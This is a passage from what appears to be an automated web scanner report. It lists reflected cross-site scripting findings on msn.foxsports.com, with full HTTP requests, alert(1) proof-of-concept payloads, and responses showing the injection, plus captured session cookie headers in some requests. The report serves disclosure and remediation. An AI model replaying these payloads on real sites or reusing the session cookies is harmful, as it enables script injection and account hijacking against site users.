pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227143
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=132
Date: Sat, 08 Jan 2011 01:31:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby-?7322e'-alert(1)-'6457fd1c49a=1';

       startComments('StoryComments', '11046872'); // load up team comments
   </script>
...[SNIP]...

3.12. http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af6e2'-alert(1)-'c7767af3893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611?af6e2'-alert(1)-'c7767af3893=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 251122
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=0A4C6D134A054BC15DDD0280414AD42C; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=33
Date: Fri, 07 Jan 2011 21:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611?af6e2'-alert(1)-'c7767af3893=1';

       startComments('StoryComments', '24815041'); // load up team comments
   </script>
...[SNIP]...

3.13. http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4119b'-alert(1)-'9a92252279d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343?4119b'-alert(1)-'9a92252279d=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248880
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D255464292004BD4E9542E619E3416EB; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343?4119b'-alert(1)-'9a92252279d=1';

       startComments('StoryComments', '24821011'); // load up team comments
   </script>
...[SNIP]...

3.14. http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe65'-alert(1)-'f79ffb350df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611?4fe65'-alert(1)-'f79ffb350df=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 247565
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=C24355AA81DD2D21081440E451A7829A; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611?4fe65'-alert(1)-'f79ffb350df=1';

       startComments('StoryComments', '24809000'); // load up team comments
   </script>
...[SNIP]...

3.15. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [gt1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

Issue detail

The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5469e'-alert(1)-'576963262f4 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?gt1=390025469e'-alert(1)-'576963262f4 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252245
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A2C889D95FE4805EF0ADFF6AEEC81927; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?gt1=390025469e'-alert(1)-'576963262f4';

       startComments('StoryComments', '24800150'); // load up team comments
   </script>
...[SNIP]...

3.16. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49bdc'-alert(1)-'91e70ffe29d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?49bdc'-alert(1)-'91e70ffe29d=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252224
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=7B8874ABAE32C8C770CE34A689CD82E1; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?49bdc'-alert(1)-'91e70ffe29d=1';

       startComments('StoryComments', '24800150'); // load up team comments
   </script>
...[SNIP]...

3.17. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [gt1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /other/gallery/Week-in-sports-photos-010611

Issue detail

The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86805'-alert(1)-'a388482b84b was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /other/gallery/Week-in-sports-photos-010611?gt1=3900286805'-alert(1)-'a388482b84b HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 232586
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=19
Date: Sat, 08 Jan 2011 01:10:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611?gt1=3900286805'-alert(1)-'a388482b84b';

       startComments('StoryComments', '198'); // load up team comments
   </script>
...[SNIP]...

3.18. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /other/gallery/Week-in-sports-photos-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d3e'-alert(1)-'44b3f0585db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /other/gallery/Week-in-sports-photos-010611?10d3e'-alert(1)-'44b3f0585db=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 232579
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=23
Date: Sat, 08 Jan 2011 01:12:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611?10d3e'-alert(1)-'44b3f0585db=1';

       startComments('StoryComments', '198'); // load up team comments
   </script>
...[SNIP]...

3.19. http://msn.foxsports.com/other/page/fox-flash [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /other/page/fox-flash

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87376"%3balert(1)//1c91713f693 was submitted in the vid parameter. This input was echoed as 87376";alert(1)//1c91713f693 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /other/page/fox-flash?vid=8dc5fe25-84b5-4135-980a-7636efe6330e87376"%3balert(1)//1c91713f693&from=foxsports/home/home_gallery HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 182067
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Sat, 08 Jan 2011 01:10:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
